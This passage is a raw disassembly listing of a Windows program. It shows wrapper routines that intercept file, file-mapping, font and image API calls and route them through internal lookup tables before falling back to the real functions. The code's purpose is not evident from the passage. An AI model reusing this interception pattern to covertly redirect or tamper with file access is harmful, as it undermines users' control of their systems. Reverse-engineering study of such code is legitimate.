; sub_41E33E+4E�j
and [ebp+var_4], 0
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4246A8 ; GetProcAddress
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41E3C6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
and [ebp+var_30], 0
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_30]
jmp loc_41E449
; ---------------------------------------------------------------------------
loc_41E3C6: ; CODE XREF: sub_41E33E+6F�j
cmp [ebp+var_1C], 0
jz short loc_41E446
mov eax, ds:dword_429034
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_41E3ED
mov eax, [ebp+var_24]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_28], 1
jmp short loc_41E3F1
; ---------------------------------------------------------------------------
loc_41E3ED: ; CODE XREF: sub_41E33E+9A�j
and [ebp+var_28], 0
loc_41E3F1: ; CODE XREF: sub_41E33E+AD�j
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_41E446
mov [ebp+var_4], 1
push [ebp+var_1C]
mov ecx, ds:dword_429034
call sub_41EB4C
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_41E41F
mov eax, [ebp+var_20]
mov eax, [eax]
mov [ebp+var_1C], eax
loc_41E41F: ; CODE XREF: sub_41E33E+D7�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41E42A
jmp short loc_41E446
sub_41E33E endp
; =============== S U B R O U T I N E =======================================
sub_41E42A proc near ; CODE XREF: sub_41E33E+E5�p
; DATA XREF: _4:00421A5C�o
mov eax, ds:dword_429034
mov [ebp-2Ch], eax
cmp dword ptr [ebp-2Ch], 0
jz short locret_41E445
mov eax, [ebp-2Ch]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_41E445: ; CODE XREF: sub_41E42A+C�j
retn
sub_41E42A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E33E
loc_41E446: ; CODE XREF: sub_41E33E+8C�j
; sub_41E33E+B9�j ...
mov eax, [ebp+var_1C]
loc_41E449: ; CODE XREF: sub_41E33E+83�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_41E33E
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E45A proc near ; DATA XREF: _5:00424290�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421A60
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
and [ebp+var_4], 0
push [ebp+arg_0]
call ds:dword_424660 ; FreeLibrary
mov [ebp+var_20], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_20]
jmp short loc_41E4B4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 1
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
loc_41E4B4: ; CODE XREF: sub_41E45A+43�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_41E45A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E4C5 proc near ; DATA XREF: _5:off_424388�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
mov eax, [ebp+arg_14]
and eax, 10h
test eax, eax
jz short loc_41E4F1
cmp [ebp+arg_8], 0
jnz short loc_41E4F1
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
call sub_413056
test eax, eax
jnz short loc_41E4F1
and [ebp+var_4], 0
loc_41E4F1: ; CODE XREF: sub_41E4C5+10�j
; sub_41E4C5+16�j ...
cmp [ebp+var_4], 0
jnz short loc_41E512
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42474C ; LoadImageA
mov [ebp+var_4], eax
loc_41E512: ; CODE XREF: sub_41E4C5+30�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_41E4C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E519 proc near ; DATA XREF: _5:off_424378�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset dword_4215BC
push offset aAddfontresou_0 ; "AddFontResourceA"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41396C
test eax, eax
jnz short loc_41E54B
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_41E54B: ; CODE XREF: sub_41E519+27�j
mov eax, [ebp+var_4]
leave
retn 4
sub_41E519 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E552 proc near ; DATA XREF: _5:00424380�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset dword_4215BC
push offset aRemovefontre_0 ; "RemoveFontResourceA"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_413D44
test eax, eax
jnz short loc_41E584
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_41E584: ; CODE XREF: sub_41E552+27�j
mov eax, [ebp+var_4]
leave
retn 4
sub_41E552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E58B proc near ; DATA XREF: _5:00424228�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_14]
and eax, 40000000h
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414344
test eax, eax
jnz short loc_41E5D2
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424628 ; CreateFileA
mov [ebp+var_4], eax
loc_41E5D2: ; CODE XREF: sub_41E58B+27�j
mov eax, [ebp+var_4]
leave
retn 1Ch
sub_41E58B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5D9 proc near ; DATA XREF: _5:00424230�o
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
; FUNCTION CHUNK AT 0041E69C SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421A70
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
and [ebp+var_20], 0
or [ebp+var_1C], 0FFFFFFFFh
and [ebp+var_4], 0
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_20], eax
xor eax, eax
mov edi, [ebp+var_20]
stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_424738 ; WideCharToMultiByte
mov [ebp+var_24], eax
cmp [ebp+var_24], 103h
ja short loc_41E663
push 0
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_10]
push [ebp+arg_4]
push [ebp+var_20]
call sub_414344
test eax, eax
jnz short loc_41E681
loc_41E663: ; CODE XREF: sub_41E5D9+70�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42462C ; CreateFileW
mov [ebp+var_1C], eax
loc_41E681: ; CODE XREF: sub_41E5D9+88�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41E68C
jmp short loc_41E69C
sub_41E5D9 endp
; =============== S U B R O U T I N E =======================================
sub_41E68C proc near ; CODE XREF: sub_41E5D9+AC�p
; DATA XREF: _4:00421A78�o
mov eax, [ebp-20h]
mov [ebp-2Ch], eax
push dword ptr [ebp-2Ch]
call sub_41BACD
pop ecx
retn
sub_41E68C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E5D9
loc_41E69C: ; CODE XREF: sub_41E5D9+B1�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 1Ch
; END OF FUNCTION CHUNK FOR sub_41E5D9
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6B0 proc near ; DATA XREF: _5:00424250�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41473F
test eax, eax
jnz short loc_41E6D0
push [ebp+arg_0]
call ds:dword_424624 ; CloseHandle
mov [ebp+var_4], eax
loc_41E6D0: ; CODE XREF: sub_41E6B0+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_41E6B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6D7 proc near ; DATA XREF: _5:00424248�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_415175
test eax, eax
jnz short loc_41E711
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4246FC ; ReadFile
mov [ebp+var_4], eax
jmp short loc_41E734
; ---------------------------------------------------------------------------
loc_41E711: ; CODE XREF: sub_41E6D7+1E�j
cmp [ebp+arg_10], 0
jz short loc_41E734
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jnz short loc_41E734
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_41E734
mov eax, [ebp+arg_10]
push dword ptr [eax+10h]
call ds:dword_424704 ; SetEvent
loc_41E734: ; CODE XREF: sub_41E6D7+38�j
; sub_41E6D7+3E�j ...
mov eax, [ebp+var_4]
leave
retn 14h
sub_41E6D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E73B proc near ; DATA XREF: _5:00424258�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41441F
test eax, eax
jnz short loc_41E76C
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424708 ; SetFilePointer
mov [ebp+var_4], eax
jmp short loc_41E778
; ---------------------------------------------------------------------------
loc_41E76C: ; CODE XREF: sub_41E73B+18�j
cmp [ebp+arg_8], 0
jz short loc_41E778
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
loc_41E778: ; CODE XREF: sub_41E73B+2F�j
; sub_41E73B+35�j
mov eax, [ebp+var_4]
leave
retn 10h
sub_41E73B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E77F proc near ; DATA XREF: _5:00424270�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_41E799
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_414214
test eax, eax
jnz short loc_41E7B4
loc_41E799: ; CODE XREF: sub_41E77F+8�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424630 ; CreateFileMappingA
mov [ebp+var_4], eax
loc_41E7B4: ; CODE XREF: sub_41E77F+18�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_41E77F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E7BB proc near ; DATA XREF: _5:00424278�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_41E7D5
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_414214
test eax, eax
jnz short loc_41E7F0
loc_41E7D5: ; CODE XREF: sub_41E7BB+8�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424634 ; CreateFileMappingW
mov [ebp+var_4], eax
loc_41E7F0: ; CODE XREF: sub_41E7BB+18�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_41E7BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E7F7 proc near ; DATA XREF: _5:00424280�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_413FDF
test eax, eax
jnz short loc_41E82F
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4246EC ; MapViewOfFile
mov [ebp+var_4], eax
loc_41E82F: ; CODE XREF: sub_41E7F7+1E�j
mov eax, [ebp+var_4]
leave
retn 14h
sub_41E7F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E836 proc near ; DATA XREF: _5:00424288�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_413EED
test eax, eax
jnz short loc_41E856
push [ebp+arg_0]
call ds:dword_424720 ; UnmapViewOfFile
mov [ebp+var_4], eax
loc_41E856: ; CODE XREF: sub_41E836+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_41E836 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E85D proc near ; DATA XREF: _5:004242F0�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0
push [ebp+arg_0]
call sub_414344
test eax, eax
jz short loc_41E8EB
cmp [ebp+arg_4], 0
jz short loc_41E8E6
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, 88h
jnz short loc_41E8E6
mov eax, [ebp+arg_4]
mov byte ptr [eax+1], 1
mov eax, [ebp+arg_4]
and word ptr [eax+2], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
cmp [ebp+var_8], 7Fh
jnb short loc_41E8BB
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
jmp short loc_41E8C2
; ---------------------------------------------------------------------------
loc_41E8BB: ; CODE XREF: sub_41E85D+54�j
mov [ebp+var_10], 7Fh
loc_41E8C2: ; CODE XREF: sub_41E85D+5C�j
mov ecx, [ebp+var_10]
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
add edi, 8
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_4]
and byte ptr [eax+87h], 0
loc_41E8E6: ; CODE XREF: sub_41E85D+22�j
; sub_41E85D+2F�j
mov eax, [ebp+var_4]
jmp short loc_41E90B
; ---------------------------------------------------------------------------
loc_41E8EB: ; CODE XREF: sub_41E85D+1C�j
push offset dword_4215AC
push offset aOpenfile ; "OpenFile"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_C]
loc_41E90B: ; CODE XREF: sub_41E85D+8C�j
pop edi
pop esi
leave
retn 0Ch
sub_41E85D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E911 proc near ; DATA XREF: _5:004242F8�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0
push [ebp+arg_0]
call sub_414344
test eax, eax
jz short loc_41E931
mov eax, [ebp+var_4]
jmp short locret_41E94E
; ---------------------------------------------------------------------------
loc_41E931: ; CODE XREF: sub_41E911+19�j
push offset dword_4215AC
push offset a_lopen ; "_lopen"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
locret_41E94E: ; CODE XREF: sub_41E911+1E�j
leave
retn 8
sub_41E911 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E952 proc near ; DATA XREF: _5:00424300�o
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
movzx eax, ds:byte_429044
and eax, 1
test eax, eax
jnz short loc_41E986
mov al, ds:byte_429044
or al, 1
mov ds:byte_429044, al
push offset dword_4215AC
push offset a_lclose ; "_lclose"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_429040, eax
loc_41E986: ; CODE XREF: sub_41E952+10�j
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41473F
test eax, eax
jnz short loc_41E9A1
push [ebp+arg_0]
call ds:dword_429040
jmp short locret_41E9A3
; ---------------------------------------------------------------------------
loc_41E9A1: ; CODE XREF: sub_41E952+42�j
xor eax, eax
locret_41E9A3: ; CODE XREF: sub_41E952+4D�j
leave
retn 4
sub_41E952 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E9A7 proc near ; DATA XREF: _5:00424310�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41441F
test eax, eax
jnz short loc_41E9E5
push offset dword_4215AC
push offset a_llseek ; "_llseek"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_41E9E5: ; CODE XREF: sub_41E9A7+19�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_41E9A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E9EC proc near ; DATA XREF: _5:00424308�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_415175
test eax, eax
jnz short loc_41EA3E
push offset dword_4215AC
push offset a_lread ; "_lread"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_C]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_41EA3E
mov [ebp+var_4], 1
loc_41EA3E: ; CODE XREF: sub_41E9EC+20�j
; sub_41E9EC+49�j
cmp [ebp+var_4], 0
jnz short loc_41EA4A
or [ebp+var_10], 0FFFFFFFFh
jmp short loc_41EA50
; ---------------------------------------------------------------------------
loc_41EA4A: ; CODE XREF: sub_41E9EC+56�j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
loc_41EA50: ; CODE XREF: sub_41E9EC+5C�j
mov eax, [ebp+var_10]
leave
retn 0Ch
sub_41E9EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA57 proc near ; CODE XREF: sub_416C60+5E3�p
; sub_416C60+629�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_8]
and dword ptr [eax+0Ch], 0
mov eax, [ebp+arg_0]
shl eax, 2
push eax
call sub_41BA4A
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov eax, [ebp+var_8]
add eax, 10h
push eax
call ds:dword_4246CC ; InitializeCriticalSection
mov eax, [ebp+var_8]
leave
retn 4
sub_41EA57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA9B proc near ; CODE XREF: sub_41EB05+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
and [ebp+var_4], 0
jmp short loc_41EAB1
; ---------------------------------------------------------------------------
loc_41EAAA: ; CODE XREF: sub_41EA9B:loc_41EAFF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41EAB1: ; CODE XREF: sub_41EA9B+D�j
mov eax, [ebp+var_14]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short locret_41EB01
mov eax, [ebp+var_14]
mov eax, [eax+8]
mov ecx, [ebp+var_4]
mov eax, [eax+ecx*4]
mov [ebp+var_8], eax
loc_41EACA: ; CODE XREF: sub_41EA9B+62�j
cmp [ebp+var_8], 0
jz short loc_41EAFF
cmp [ebp+arg_0], 0
jz short loc_41EADF
mov eax, [ebp+var_8]
push dword ptr [eax]
call [ebp+arg_0]
pop ecx
loc_41EADF: ; CODE XREF: sub_41EA9B+39�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_8], eax
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_41BACD
pop ecx
jmp short loc_41EACA
; ---------------------------------------------------------------------------
loc_41EAFF: ; CODE XREF: sub_41EA9B+33�j
jmp short loc_41EAAA
; ---------------------------------------------------------------------------
locret_41EB01: ; CODE XREF: sub_41EA9B+1E�j
leave
retn 4
sub_41EA9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB05 proc near ; CODE XREF: sub_418B30+51�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
push 0
mov ecx, [ebp+var_8]
call sub_41EA9B
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_4], eax
push [ebp+var_4]
call sub_41BACD
pop ecx
mov eax, [ebp+var_8]
add eax, 10h
push eax
call ds:dword_4246D0 ; RtlDeleteCriticalSection
leave
retn
sub_41EB05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB38 proc near ; DATA XREF: sub_41EB4C+C�o
; sub_41EBBB+C�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
cmp eax, [ebp+arg_4]
setnz cl
mov eax, ecx
pop ebp
retn 8
sub_41EB38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB4C proc near ; CODE XREF: sub_413056+94�p
; sub_4136FE+63�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_41EDD9
push offset sub_41EB38
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_41EB6C
leave
retn 4
sub_41EB4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB6C proc near ; CODE XREF: sub_41925C+20�p
; sub_41EB4C+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_8]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov ecx, [ecx+8]
mov eax, [ecx+eax*4]
mov [ebp+var_4], eax
loc_41EB8D: ; CODE XREF: sub_41EB6C+47�j
cmp [ebp+var_4], 0
jz short loc_41EBB5
push [ebp+arg_0]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call [ebp+arg_4]
test eax, eax
jnz short loc_41EBAA
mov eax, [ebp+var_4]
mov eax, [eax]
jmp short locret_41EBB7
; ---------------------------------------------------------------------------
loc_41EBAA: ; CODE XREF: sub_41EB6C+35�j
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_41EB8D
; ---------------------------------------------------------------------------
loc_41EBB5: ; CODE XREF: sub_41EB6C+25�j
xor eax, eax
locret_41EBB7: ; CODE XREF: sub_41EB6C+3C�j
leave
retn 0Ch
sub_41EB6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EBBB proc near ; CODE XREF: sub_413838+93�p
; sub_413D44+106�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_41EDD9
push offset sub_41EB38
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_41EBDB
leave
retn 4
sub_41EBBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EBDB proc near ; CODE XREF: sub_419529+2F6�p
; sub_41EBBB+17�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_18], ecx
mov eax, [ebp+var_18]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_8]
pop ecx
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_18]
mov eax, [eax+8]
mov ecx, [ebp+var_C]
mov eax, [eax+ecx*4]
mov [ebp+var_8], eax
mov eax, [ebp+var_18]
mov eax, [eax+8]
mov ecx, [ebp+var_C]
lea eax, [eax+ecx*4]
mov [ebp+var_4], eax
loc_41EC12: ; CODE XREF: sub_41EBDB+86�j
cmp [ebp+var_8], 0
jz short loc_41EC63
push [ebp+arg_0]
mov eax, [ebp+var_8]
push dword ptr [eax+4]
call [ebp+arg_4]
test eax, eax
jnz short loc_41EC4F
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov ecx, [ecx+8]
mov [eax], ecx
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
push [ebp+var_14]
call sub_41BACD
pop ecx
mov eax, [ebp+var_10]
jmp short locret_41EC65
; ---------------------------------------------------------------------------
loc_41EC4F: ; CODE XREF: sub_41EBDB+4B�j
mov eax, [ebp+var_8]
add eax, 8
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_8], eax
jmp short loc_41EC12
; ---------------------------------------------------------------------------
